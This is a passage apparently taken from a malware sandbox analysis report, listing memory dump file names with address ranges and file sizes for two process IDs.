                Filesize

                50.7MB

              • memory/3380-305-0x0000000009010000-0x000000000C2CB000-memory.dmp

                Filesize

                50.7MB

              • memory/3380-307-0x00000000744D0000-0x0000000074C80000-memory.dmp

                Filesize

                7.7MB

              • memory/3380-308-0x0000000002C50000-0x0000000002C60000-memory.dmp

                Filesize

                64KB

              • memory/3380-309-0x0000000076EF1000-0x0000000077011000-memory.dmp

                Filesize

                1.1MB

              • memory/3380-274-0x0000000002C70000-0x0000000002CA6000-memory.dmp

                Filesize

                216KB

              • memory/3380-311-0x0000000002C50000-0x0000000002C60000-memory.dmp

                Filesize

                64KB

              • memory/3380-312-0x0000000009010000-0x000000000C2CB000-memory.dmp

                Filesize

                50.7MB

              • memory/3380-395-0x0000000009010000-0x000000000C2CB000-memory.dmp

                Filesize

                50.7MB

              • memory/3380-280-0x0000000005F40000-0x0000000005FA6000-memory.dmp

                Filesize

                408KB

              • memory/3380-382-0x00000000744D0000-0x0000000074C80000-memory.dmp

                Filesize

                7.7MB

              • memory/4384-315-0x0000000076F78000-0x0000000076F79000-memory.dmp

                Filesize

                4KB

              • memory/4384-331-0x0000000076EF1000-0x0000000077011000-memory.dmp

                Filesize

                1.1MB

              • memory/4384-380-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-328-0x0000000001F70000-0x000000000522B000-memory.dmp

                Filesize

                50.7MB

              • memory/4384-381-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-314-0x0000000076EF1000-0x0000000077011000-memory.dmp

                Filesize

                1.1MB

              • memory/4384-383-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-384-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-313-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-396-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-397-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-393-0x0000000001F70000-0x000000000522B000-memory.dmp

                Filesize

                50.7MB

              • memory/4384-400-0x0000000000D10000-0x0000000000D92000-memory.dmp

                Filesize

                520KB

              • memory/4384-403-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-310-0x0000000001F70000-0x000000000522B000-memory.dmp

                Filesize

                50.7MB

              • memory/4384-405-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-406-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-407-0x0000000000D10000-0x0000000000D92000-memory.dmp

                Filesize

                520KB

              • memory/4384-408-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-409-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-410-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB

              • memory/4384-411-0x0000000000D10000-0x0000000001F64000-memory.dmp

                Filesize

                18.3MB